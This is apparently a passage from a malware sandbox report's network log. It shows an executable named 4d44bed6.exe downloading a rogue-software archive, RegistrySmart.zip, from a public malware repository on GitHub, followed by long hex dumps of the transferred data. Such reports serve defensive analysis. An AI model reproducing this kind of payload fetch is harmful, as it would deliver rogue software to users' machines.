                                                                                                                                                2022-09-29 12:51:50 UTC28547INData Raw: cc c5 23 cd 9f 5c 21 cd f9 86 01 8c ec ce bf 36 a4 5d 66 3c 93 a9 9a 01 da 71 09 a3 0f 60 5c fe 09 85 32 51 fe 54 77 9c 69 a7 5f 6f 3c 4b 02 32 0d e8 ff 03 32 72 d5 17 01 a8 f3 2a 6e 71 6d 15 c4 e1 a2 62 45 42 ea 4a f3 f9 34 7e 04 32 25 c1 17 98 27 75 2b 00 7d 46 c0 e8 59 c2 19 40 32 47 1b 7a 22 46 be c6 00 17 1e 0b 62 e2 78 6d cf a5 c6 d9 94 19 7e f4 43 e0 3c f5 04 40 55 46 cb 2e 0d b5 73 35 1b 06 b9 32 2f 64 92 75 f1 89 31 2c 22 21 26 8a 2d 76 90 f3 27 64 07 70 31 e2 0f 4f a8 8b e7 39 5f 43 1b 6b 9e 90 81 8a 59 4f 11 9c 59 c3 c2 37 98 dd 9c 62 89 1c 1a 2a 50 f3 cd a8 c1 01 0d fa 08 1c 41 e5 47 97 08 c6 25 d0 3c 9b a7 35 d7 a6 59 94 76 95 37 c3 fd c6 3b a9 01 e2 36 36 3a c9 39 9c 58 9c c9 e2 fd 44 07 31 79 39 b2 e2 3f 12 b4 52 e5 3d 48 bf 08 e0 7f 7c df
                                                                                                                                                Data Ascii: #\!6]f<q`\2QTwi_o<K22r*nqmbEBJ4~2%'u+}FY@2Gz"Fbxm~C<@UF.s52/du1,"!&-v'dp1O9_CkYOY7b*PAG%<5Yv7;66:9XD1y9?R=H|
                                                                                                                                                2022-09-29 12:51:50 UTC28563INData Raw: ce 97 de fc 0d 24 26 e7 76 eb d1 be 1e 48 a7 92 3a 50 5b a4 2c e7 6a 33 6d eb 70 68 76 6d bb 3e be 37 51 ee af 48 a1 c0 00 01 1d 13 b4 e4 be 9a 2c f0 82 d5 32 82 6c 57 5a b4 af 6f 0e 1e fd eb f3 d9 67 be f0 b6 ec c9 6b 67 cc 05 fc 88 3f 08 45 4a 1e e3 6d 92 18 75 96 23 6a 74 78 a1 1e 4f 40 3a 7f c3 74 20 30 08 21 e1 90 32 94 25 72 bd e8 20 fa ca 5e 18 40 67 ec a4 ab 8c 90 62 40 5b 37 3e 13 df f9 c6 51 d3 f3 cc c2 7f 5a 3f d2 c7 de 89 92 cf 99 83 b4 6f ce 0a c3 79 df 99 d3 9c d0 01 2d 48 1c fb 0f a2 4c 96 78 71 25 97 4f e7 15 9f 0c 68 45 ea 6f 84 08 a3 d3 66 7f 84 b9 e4 08 86 92 db a1 dd 69 8a 09 2b e0 5a e6 d7 15 4b 4e c8 74 f1 f5 6f 77 e5 2a 3d 81 0d 12 56 a0 4a c3 e4 cf f2 9f 93 02 64 9c ab 62 2e 6a 1c 32 f4 f3 7c 28 c6 58 cf b1 a3 b7 2f d7 fe 05 6e 5e
                                                                                                                                                Data Ascii: $&vH:P[,j3mphvm>7QH,2lWZogkg?EJmu#jtxO@:t 0!2%r ^@gb@[7>QZ?oy-HLxq%OhEofi+ZKNtow*=VJdb.j2|(X/n^
                                                                                                                                                2022-09-29 12:51:50 UTC28579INData Raw: 73 f6 76 70 13 c8 4b 0c 51 8b 9b 39 93 80 1e 97 2d 0d 0d 6a 35 0b 7b c7 ab 4a 75 8b f7 4b fe c6 8c 62 da 03 0b d3 b1 7e 12 64 bb 2b 66 e3 2b ed 06 4f e7 1e ef 81 df 21 4a 71 10 3e 60 3e 8b 5c c4 ef d6 2b f7 18 15 02 f2 86 2c 56 a8 f7 46 3b 5f d2 09 52 ff 9b 2a 73 f3 12 85 76 e1 d2 e7 aa be 4f 5f c0 71 ca e9 c1 e9 92 02 6c b4 57 3e 7c 49 0b 69 0c 9d 51 00 c0 6b 18 03 18 21 a1 00 ef af e3 ca 0c b4 59 f0 31 5f 1f 38 69 67 43 f8 b2 b0 5d 55 9b b8 5e 8d 76 8f ff ba ad 3d 6a 70 89 50 35 6e 18 bd d9 a0 d6 00 79 5f 98 47 d6 b2 bb 2d 64 d8 cf 07 ae c0 ee b8 f4 ab b6 58 c0 0f 77 71 04 92 fc 6e 20 ed 4c e4 43 3b f0 95 c3 44 1e 01 98 c5 36 cf d8 54 f8 43 95 8a db a2 a1 2d 4c 6d b1 61 2e eb d4 e4 50 14 05 ec 45 ad e0 88 11 cc 32 cf d5 80 64 f3 da 5b 56 bc c8 87 4d bc
                                                                                                                                                Data Ascii: svpKQ9-j5{JuKb~d+f+O!Jq>`>\+,VF;_R*svO_qlW>|IiQk!Y1_8igC]U^v=jpP5ny_G-dXwqn LC;D6TC-Lma.PE2d[VM


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                52192.168.2.549752140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:50 UTC28584OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:50 UTC28584INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:50 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:50 UTC28585INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                53192.168.2.549753185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:50 UTC28587OUTGET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:50 UTC28587INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1070715
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "1d24269eaf781907e4c1af48234a4a75d4d097f07863219e5c2eb72d5943a4d9"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0807:0541:22EA5A:2E231E:63359360
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:50 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6964-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455911.806815,VS0,VE160
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 616b07a9e54a68fe5610a0cda7625a9f0454c9af
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:50 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:50 UTC28588INData Raw: 50 4b 03 04 33 00 01 00 63 00 08 61 55 4d 00 00 00 00 a7 55 10 00 70 bc 10 00 1c 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 52 65 67 69 73 74 72 79 53 6d 61 72 74 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b9 21 09 4a 7c 9c 8c 4c 0e 36 13 b9 58 07 20 9e 22 2f 2c 6b 82 70 ca 5c 39 7c a2 07 a5 11 35 7e fb a8 14 c8 0b 2a 30 0d 8a 99 c6 3a 6c e3 c0 dd 0a 73 5d e0 4f f9 3d 77 f4 dd c6 8a 53 bd 95 5b bf 93 ed 29 b0 50 34 88 15 c0 df f0 38 87 1b 10 9a 47 02 e0 5e 8b 6b 46 62 90 ee 5d d7 84 5d a7 0d 75 91 86 35 f6 de 3c 6d 1e 2f 2c 76 e2 33 85 f7 8e a5 65 f5 55 8f b4 2f 6b c8 b3 69 8b 8e c0 30 10 e6 34 b8 b3 bf cc 26 be 1f 82 ab 82 ab f0 e5 f5 92 20 b1 91 e9 f6 fc d4 60 dd 90 07 74 75 c2 8d e1 92 61 da d5 e6 8a ff e7 b5 06 5d 4b c6 30 83 ae bb 41 2c 8c 23 73 7a
                                                                                                                                                Data Ascii: PK3caUMUpEndermanch@RegistrySmart.exeAE!J|L6X "/,kp\9|5~*0:ls]O=wS[)P48G^kFb]]u5<m/,v3eU/ki04& `tua]K0A,#sz
                                                                                                                                                2022-09-29 12:51:50 UTC28604INData Raw: ab 82 d6 f0 4f c9 70 d7 b5 cd 06 07 3c b0 7d d1 6d cb 29 bb 10 e5 2b 7a b9 33 e3 bf 11 3e 68 84 1b f6 b2 1e d9 c3 a2 1e 5d 9b 57 12 5d 85 d9 e1 d1 fa 9c 12 fa e3 af 9e 36 7f 31 40 3b 37 4f 76 85 cb ab 86 77 df 7f 60 d4 df 7a 21 a8 0c 84 d1 2c 4f 4b 6d 90 94 ea c2 20 f9 09 b4 05 91 38 53 0d de 9c 50 30 a6 7d bc 4c e2 73 f2 d2 0e 3b 2d 3e 4c 10 06 4f 43 32 7b c6 16 04 73 58 24 0a 19 fa eb ed fc b2 0e 18 fa 93 cb 4b 5a 95 50 16 d6 21 80 af f1 04 52 63 7d 2e 87 b0 60 cc 9d 85 a7 ef 35 da f7 52 99 2d 7e 57 bd e3 ec 08 9c e4 74 02 62 bc 8c c4 a7 a5 bf d8 37 52 dd 78 65 42 4a d4 6a a6 74 db ef f5 ca 7f 37 18 99 ce 05 51 9c 61 83 50 42 9b 89 17 85 3d 14 29 ac 28 37 ff 88 76 03 79 81 5b 2e f6 8f 0d b7 08 91 95 3c 8a 69 f8 60 ea 02 60 f5 99 ef 29 8a 62 c8 26 df 9d
                                                                                                                                                Data Ascii: Op<}m)+z3>h]W]61@;7Ovw`z!,OKm 8SP0}Ls;->LOC2{sX$KZP!Rc}.`5R-~Wtb7RxeBJjt7QaPB=)(7vy[.<i``)b&
                                                                                                                                                2022-09-29 12:51:50 UTC28620INData Raw: 18 96 1c a9 d8 a0 d5 eb 80 8e 38 ef c8 b8 c7 ec 17 14 aa 75 9d 84 73 4e c5 90 f0 f4 f6 25 7f b2 9d 51 fa 18 3a 62 5e c3 27 4b e0 2e d4 e4 00 f5 90 75 e5 36 ce 85 6b a0 96 f1 dd 38 42 9b c1 17 4b a0 42 6c d9 14 44 9a 72 ab 9d 51 e2 92 8e 21 8a 7b 0e c1 c2 90 0f 16 45 24 66 53 8b b9 48 e5 a2 ef eb a9 5e 51 a3 40 26 f5 8a 00 8a f5 f8 44 db 08 83 67 3d 96 86 31 56 55 1d d9 91 00 9a 4a 4c 00 ed 86 2e 96 74 76 3f e7 48 70 2a 9e b5 19 89 30 8f c7 3f 3f 35 e0 13 46 fb 41 24 1f 03 3d 27 cd 36 bd c0 69 81 67 03 29 53 d9 33 55 b6 ed 47 db ef e4 5b 1f 2b 33 dc 80 e5 5f b1 67 4b f5 2e 90 7c a9 80 46 6b 09 ff 9c 6f a0 ff cd 74 a2 56 33 36 fd a9 ac 0c ec 9f e1 d6 0e 38 46 6a 5c da 36 b5 d1 84 83 6c 98 c7 44 d5 a1 7a e9 92 73 0f 42 d7 74 ac 4b 82 67 db 03 30 13 b3 ed 70
                                                                                                                                                Data Ascii: 8usN%Q:b^'K.u6k8BKBlDrQ!{E$fSH^Q@&Dg=1VUJL.tv?Hp*0??5FA$='6ig)S3UG[+3_gK.|FkotV368Fj\6lDzsBtKg0p
                                                                                                                                                2022-09-29 12:51:50 UTC28636INData Raw: 81 9f d2 b8 a3 42 2f 08 c1 c6 cf 25 5a e5 6a 24 8a 3e d9 cc 23 a6 03 f7 59 8f 62 d0 e2 48 a9 94 16 df 39 19 a6 66 04 dc 1a 96 e6 2a d5 64 9f 0b dc 54 23 3e e6 d8 13 4a 20 b8 61 67 99 f4 7d b4 88 66 d5 9e 3c bd be 1f 2e 37 96 2e bc 36 ab eb 47 cb b9 72 af fd 22 eb 97 c6 7d d9 fd f3 38 7a a0 9b 26 f2 d3 b4 e1 e5 6a 5c cf 69 e4 da 89 43 09 0e 7a a7 af 94 9c a6 47 b2 08 cd 47 12 ee 76 7f 99 bc 95 d7 9a 52 55 cd a2 78 cb e8 f9 3d 9d c2 68 c4 49 ac b9 c5 53 2a 2d d4 9c 65 c0 90 5d e9 25 16 e6 70 18 2f c3 5d 61 6c 6b 01 13 ea cf 2d 05 4c 9f cd a7 3b 63 3c 6b a2 b2 b5 0f 1e 8c 37 cc f5 b9 17 76 ce fc f0 b0 bb 8d 16 17 28 10 b0 f4 4a 40 9f b8 75 5d b0 80 4c 35 58 71 fa e2 7c ba 97 c0 e3 60 aa 58 7a 25 1a 83 c8 19 27 5b d5 32 ed ba d8 d7 0c 36 61 7a 2c ff 5a f0 48
                                                                                                                                                Data Ascii: B/%Zj$>#YbH9f*dT#>J ag}f<.7.6Gr"}8z&j\iCzGGvRUx=hIS*-e]%p/]alk-L;c<k7v(J@u]L5Xq|`Xz%'[26az,ZH
                                                                                                                                                2022-09-29 12:51:50 UTC28652INData Raw: 8f 0a 03 cf 48 fe 07 d1 c2 2d f2 84 05 16 ed 32 b5 6d 9a c7 82 0e c0 3d 3f fb 54 86 19 fa 7e 85 03 90 7c 6b 9c f6 6f 8a 07 92 e1 96 47 0d fd d2 b3 f6 a5 d0 28 51 13 52 9a 92 8f 13 2a b7 53 34 d3 46 88 29 8e 5b 85 a7 d0 b7 ab 1a 12 ce e6 06 f9 88 6c 7c 6b 2f 55 37 b4 2c ab 95 3e 41 c9 fa 90 38 51 46 4e 42 ca 4f 3e f1 e0 03 d3 4b 18 06 fb 90 07 47 53 0f 8c e1 a0 65 ef 29 84 5d aa cf e2 4a dd 6f 95 bb 21 cf ad a7 74 18 20 37 d0 7d fb f1 7c cd 99 e8 52 2e 2a d4 fa 8d 0b d5 13 ef 89 f5 58 34 45 9b ad 6c d1 4c 4d 98 88 04 40 de b4 e2 ee 18 da ec 0f bc c2 8f f5 94 35 b4 9e a1 28 55 01 68 84 a4 2e 02 c1 88 ec f3 9d e2 27 23 a6 e0 2a 60 6d 0f 34 36 e4 f1 41 98 e2 f2 f8 34 11 41 04 a9 a1 d2 e7 6a ff 79 77 e3 f0 37 67 85 9b 56 29 7a d3 0f 44 97 22 1a 79 58 30 27 c3
                                                                                                                                                Data Ascii: H-2m=?T~|koG(QR*S4F)[l|k/U7,>A8QFNBO>KGSe)]Jo!t 7}|R.*X4ElLM@5(Uh.'#*`m46A4Ajyw7gV)zD"yX0'
                                                                                                                                                2022-09-29 12:51:51 UTC28668INData Raw: 76 54 37 29 88 15 71 a6 20 fe ab e7 8f fa b8 b2 07 f7 86 a1 dc 99 e0 ac 1f 7f b9 e3 5b 85 75 ee 9a 69 68 da 23 5a 81 6d 48 35 6f e8 e8 1e 22 93 11 50 29 0b a3 a4 91 1e e9 d8 40 88 26 47 42 28 fc e9 e8 b2 1f 8d 60 5c c0 b1 af ad 47 d3 e2 e9 bf bc 92 41 2d 5d da c6 92 92 5c 3e c6 e9 01 2f 81 2c 73 ce e3 10 f9 3c 21 ee ce a7 35 e9 c9 cf 65 07 4f 85 70 40 1c ab 92 6d ed 84 bf 07 b0 fa e6 80 ae 87 4d 84 fa a6 21 ff d0 83 2b 69 83 fc 81 f3 f5 0a ad e9 c3 c2 ba d8 d1 eb 5e ec 56 56 c6 5f 8f 78 cb 2c 41 ab 72 67 01 2a c6 87 86 5e e9 4c 09 4a ad 3e 4d 8d 18 ec 1a e1 1a 2b 18 eb 7f ad f9 6a cf e8 2f d6 5e bd 40 82 19 91 aa 21 0e 81 db 11 96 71 a2 be 0d 26 58 82 97 50 72 d2 ff 67 ee 1c 9d db 57 a6 6e b3 76 bd 84 8e 7e cf bc 95 47 8c 2b e1 30 81 ae 2b 83 63 e3 7e fb
                                                                                                                                                Data Ascii: vT7)q [uih#ZmH5o"P)@&GB(`\GA-]\>/,s<!5eOp@mM!+i^VV_x,Arg*^LJ>M+j/^@!q&XPrgWnv~G+0+c~
                                                                                                                                                2022-09-29 12:51:51 UTC28684INData Raw: 4a d9 4a ae 0a 02 6f 30 30 7f 34 b9 77 43 0d 64 09 43 11 7d 18 92 38 ca bb 3f 78 49 6e d1 67 9f a5 91 1b 60 74 d5 f2 1a d6 9c e2 09 97 5f 31 6f 74 f7 1d 10 da 18 71 b6 cb 5f 87 70 49 84 97 33 c0 c9 cd d0 e2 ac aa 19 93 a2 2d 99 10 51 b3 e8 f4 fa 57 cb 5f c7 5f a5 1c e9 26 1e 93 2d f2 3e 6f 11 3a b9 92 64 2e c2 85 62 37 fc bf c7 dd 81 69 de 57 e1 d4 fc 4b 6f da 86 af ea 3c e0 e5 d6 59 78 b7 b9 64 13 a3 65 f8 24 a1 26 93 cc 65 d1 20 3f 77 3d ed bf 35 fc bd d7 0d 75 0e 38 47 2d da 3f 0b 03 12 5b 55 17 21 1a 8b 63 54 eb 0a 22 ca 85 69 85 e2 95 5f 6b 15 4b 5c 9c d3 78 24 ae a6 7e 66 15 24 02 0e d5 c3 33 05 68 7f 8d 9c 6a 47 21 94 a0 f8 7d 1b 2b f5 51 d1 04 0f 82 e7 96 c6 19 00 c8 b0 4f 60 fa 17 5c ad c9 4c c8 8c 71 02 90 55 d9 df 8e 86 0b d4 68 02 15 a7 6a 1c
                                                                                                                                                Data Ascii: JJo004wCdC}8?xIng`t_1otq_pI3-QW__&->o:d.b7iWKo<Yxde$&e ?w=5u8G-?[U!cT"i_kK\x$~f$3hjG!}+QO`\LqUhj
                                                                                                                                                2022-09-29 12:51:51 UTC28700INData Raw: ef 41 85 03 4b 42 a5 6b ba 26 30 5e d9 37 3f 7b c1 c7 34 50 04 71 6b 23 ad 50 c4 1e e7 f9 39 d2 8e f5 b7 90 d7 bb 5c 63 bf bf ec a7 81 5b 77 0e 41 4b 4e 6f 0c 64 4e e9 cf 73 c6 3d 6e 24 4a 09 f2 fb f3 ac 4c 37 c4 fb 6d d3 6b df 5c 9d 39 35 8d 59 b0 f3 42 f8 1d 8e 85 5c 94 04 2a a1 95 99 4c e4 16 ea d8 d2 40 a7 ff f0 7f 4e 1a 67 7a b4 e4 f3 f1 6a 91 74 17 65 66 d5 0b 92 cd 01 e7 60 1e c4 f9 a4 bb 24 5d 2e 70 38 10 b4 a0 28 c9 f9 fb 24 28 0b 18 83 d9 e4 a6 d4 5f 96 a4 f5 e9 1c 34 8e 83 e8 1a d7 f3 be 5f 3f 01 60 27 bb e9 20 15 41 54 92 a0 b3 09 ff f8 63 2a c6 74 3e c2 b6 4d 16 2c bc 06 5c 5a ef f9 84 8d ab 72 33 a5 6f 86 f0 24 5d c4 21 eb 17 0b 00 e3 6b e4 79 8f eb d7 08 82 3a 8a 18 bc fb bd 42 02 51 22 b7 22 e0 0c 19 7f 63 e7 39 84 51 aa 8d c8 17 b9 58 16
                                                                                                                                                Data Ascii: AKBk&0^7?{4Pqk#P9\c[wAKNodNs=n$JL7mk\95YB\*L@Ngzjtef`$].p8($(_4_?`' ATc*t>M,\Zr3o$]!ky:BQ""c9QX
                                                                                                                                                2022-09-29 12:51:51 UTC28716INData Raw: 8f 6a 4e a0 2a ac cd ff 9a a9 a2 6f 5a fb 14 b5 11 d9 c5 ad e8 8b e7 f5 3d 16 28 ba 15 93 dc ce 91 0d bd db f4 de 03 79 75 16 e9 f6 6a ab 33 aa ff a8 9b 6f b1 7c a2 a3 30 0b 82 9f 46 e0 36 50 9c 1f 40 d8 0b 70 34 a5 25 3d 18 90 aa 11 a7 cf c5 2c ad a1 e5 c7 af 0c 7f 1f bb 6a 36 30 bf 57 89 39 95 a6 40 48 ab d1 bb 90 70 fb 6c 28 d6 d2 96 5b f3 44 60 d8 61 b7 54 e6 ec 45 25 70 47 b4 29 57 b8 16 a0 a5 ba ac b6 6a 47 83 fe 6f 64 8b 3a b5 b1 5b ea de 6f 31 3a 8d e7 cd 77 e6 12 7c 9c 8f df aa 6c 2d 34 bd 74 a6 b8 82 0c 15 e8 a9 1f 8f c9 41 0a f0 44 69 f5 45 70 a3 f5 f0 bb 48 3d a1 49 19 51 39 43 20 ce 7a 3a 28 fd 8a 4b 25 11 7c be 91 da 93 0b ab 05 ca 33 6d 19 70 a5 cc e2 24 17 21 1a 51 0b 56 c3 04 60 fe 9b 97 86 94 be 30 13 63 48 4b d0 ef 6b 54 be 88 8e c6 38
                                                                                                                                                Data Ascii: jN*oZ=(yuj3o|0F6P@p4%=,j60W9@Hpl([D`aTE%pG)WjGod:[o1:w|l-4tADiEpH=IQ9C z:(K%|3mp$!QV`0cHKkT8
                                                                                                                                                2022-09-29 12:51:51 UTC28732INData Raw: 3b d5 8c 08 e1 e8 5b e4 70 e7 93 46 37 61 85 f2 83 10 21 d8 9d 07 12 8d 05 d2 0a a7 2b dd 81 ec b2 a7 29 c5 b7 7e 22 2e 0b 4a 48 80 d9 49 78 de bc e2 5e b9 23 96 3d fc 37 d4 f3 ea f8 27 76 c7 56 4a 06 20 80 28 27 c0 68 32 cb 3e 79 87 72 e6 25 1a af f1 f3 7e 1c bb 6b dc 24 22 ac be 31 ea 30 89 23 bc 2e 37 00 9a f4 57 f2 b7 69 e4 36 af 36 4d 23 91 1f 68 4a cf 8d 97 b4 c1 d2 e6 15 30 d9 ae ae a4 5b 10 5d ff 0d d3 7d 88 67 2b 20 56 4a 3c 60 ee 19 7c 97 ac c2 96 1d 63 f9 3b c9 3e dd 7a a7 6f 93 54 c6 99 0a 91 d8 8e 18 7a d3 ca 68 00 1b cb 0d e9 78 2f 5a 4e 79 7d ed c1 75 9f 7d 37 f0 3c bd 80 c7 08 19 a8 19 72 1f 05 71 1e e7 5f f0 51 63 3c a5 1f db 67 25 ca 81 0e ea 40 86 d1 94 ab b8 70 81 85 f7 df 4b 2d ad f1 57 ab 88 23 5b 00 32 1f e4 f1 34 2b 84 a9 34 63 1b
                                                                                                                                                Data Ascii: ;[pF7a!+)~".JHIx^#=7'vVJ ('h2>yr%~k$"10#.7Wi66M#hJ0[]}g+ VJ<`|c;>zoTzhx/ZNy}u}7<rq_Qc<g%@pK-W#[24+4c
                                                                                                                                                2022-09-29 12:51:51 UTC28748INData Raw: 1a 88 64 aa 2b f2 c0 60 5e 9d b5 ed a9 4b 47 16 4b 25 86 0d b0 7c dc 9c 04 a2 d9 f2 57 bd be ab 0c d4 0c fb 1a 31 4f 7e 72 57 fc 9a bf 2a ee 8f 4e 66 70 44 1a b5 91 60 ff a4 43 09 e1 78 e5 f8 a1 ee 2d 07 dd 60 62 93 40 c4 55 78 44 76 49 d4 34 43 3e 28 41 e0 10 f6 69 93 fe a6 3a 3d ac bf 37 d3 27 33 b3 cd 0e f4 8e cc c7 51 66 72 99 29 08 48 c6 17 4a ca 2a 09 12 45 29 02 e8 4b 8c 03 0b c9 07 4d d0 89 13 28 9f b2 84 45 fd 74 5b 86 41 42 ec e1 fb fd 2b 54 ff 71 8e ab ba 0c c6 e1 a3 47 5c 5a 13 2e dc b3 d0 9b 90 94 49 05 a1 80 d7 a0 fb ff de 8e 1c 09 52 64 0b 8a 76 09 76 17 01 9a 79 f6 52 e2 3c d9 92 2a e9 02 78 9d 8c 30 c6 15 17 4c be 18 0a 4b d4 20 02 4a e6 a8 fa fd ec c6 67 79 fb c1 1b 47 50 4c 6b ea 93 9b a1 4e a9 c8 fd 47 57 07 79 6c 87 dc 39 6f 1e aa cf
                                                                                                                                                Data Ascii: d+`^KGK%|W1O~rW*NfpD`Cx-`b@UxDvI4C>(Ai:=7'3Qfr)HJ*E)KM(Et[AB+TqG\Z.IRdvvyR<*x0LK JgyGPLkNGWyl9o
                                                                                                                                                2022-09-29 12:51:51 UTC28764INData Raw: 8d b2 f6 78 fa 4e aa 1a a6 67 ac f9 e2 f7 ee 9d 60 db fc 88 3e 4a d9 8d 6b 82 e8 61 9a 43 94 30 4b 89 e5 27 f9 dc 62 f2 ff 7b 89 56 e6 a0 3a a4 8c 02 7a ca f6 56 c7 71 27 c1 d9 c1 b4 5b cc 54 99 9e ca ab 5e bb 96 d5 bd a0 e2 76 83 92 bb d3 01 f6 b5 79 d0 cc fa ae e1 c2 1f 81 1c 54 5d ae 48 07 f8 38 a9 b7 e3 8b 5e e1 a5 7a 8c e4 cf 78 00 33 22 6b 15 b2 84 2d 41 a8 c7 9c 5c b1 4e 6a 4f ce c0 77 bf 0a 0d af e4 ea 43 70 3e 63 85 bd 0b b2 28 bc 0b b4 e0 93 fd ee f9 41 40 f5 b6 0d b5 85 53 cf 67 5c 28 88 5e 03 36 4f 7d 05 9f da c9 95 06 77 02 12 3a a4 8c 0b 01 84 9d 22 27 4d 5c 60 41 1f 0d e0 bb b9 e0 cb 9e 4b 65 ee e1 b2 4e 12 5c d9 db 7d 70 e9 4d c6 cd ef 23 30 98 94 cf 6b 1c a2 25 9c 99 4c fc 3a 55 25 df 93 bd 1c 0e ae 94 48 c9 2e ce 70 d3 d1 8b 02 6a be 32
                                                                                                                                                Data Ascii: xNg`>JkaC0K'b{V:zVq'[T^vyT]H8^zx3"k-A\NjOwCp>c(A@Sg\(^6O}w:"'M\`AKeN\}pM#0k%L:U%H.pj2
                                                                                                                                                2022-09-29 12:51:51 UTC28780INData Raw: fb 49 46 f3 14 91 f6 63 76 86 f2 7b 78 f7 50 39 3d 2e e2 5b 52 62 f6 cb 1d ae 37 eb 95 3d b2 35 48 66 b2 b9 35 71 2b c2 1b 3f bf 29 5d d0 28 03 60 27 ce 53 3d cd ad 63 11 17 24 b3 91 62 27 50 8e 7f 77 59 1f 62 e4 f5 f1 83 d6 91 d8 db 6a 19 00 7c bf a3 2f 8a 5e 94 d5 98 4f a3 cc ed d0 20 c2 d6 d1 04 b8 a0 bb 6d 23 33 6b 53 51 73 0d f3 02 03 3f dd 34 16 d3 8d bb b9 c8 f8 82 fc 35 fe 18 7b 05 18 9a 27 cc 03 6b f1 e0 bf 03 0b fa 3d 09 6e 4b 5b 02 38 45 a1 0b f0 cc cd 2e 2a 7b dc e3 fa 04 0b 07 53 b8 18 94 2b 84 70 e5 9e cf 76 96 56 0b f9 09 81 ef 8e b7 c6 e4 45 d1 ec 94 0a 80 34 ca 48 c8 f4 93 a3 c0 8a bf c3 de 50 31 1c 71 25 2c df 36 c9 a6 20 b9 29 ce 95 70 11 15 5d c3 7b 28 4c 8f 52 17 d4 2e 74 0c 3e 50 24 da db 52 8c 7c 61 f7 d7 16 e0 c3 13 58 2d 16 73 07
                                                                                                                                                Data Ascii: IFcv{xP9=.[Rb7=5Hf5q+?)](`'S=c$b'PwYbj|/^O m#3kSQs?45{'k=nK[8E.*{S+pvVE4HP1q%,6 )p]{(LR.t>P$R|aX-s
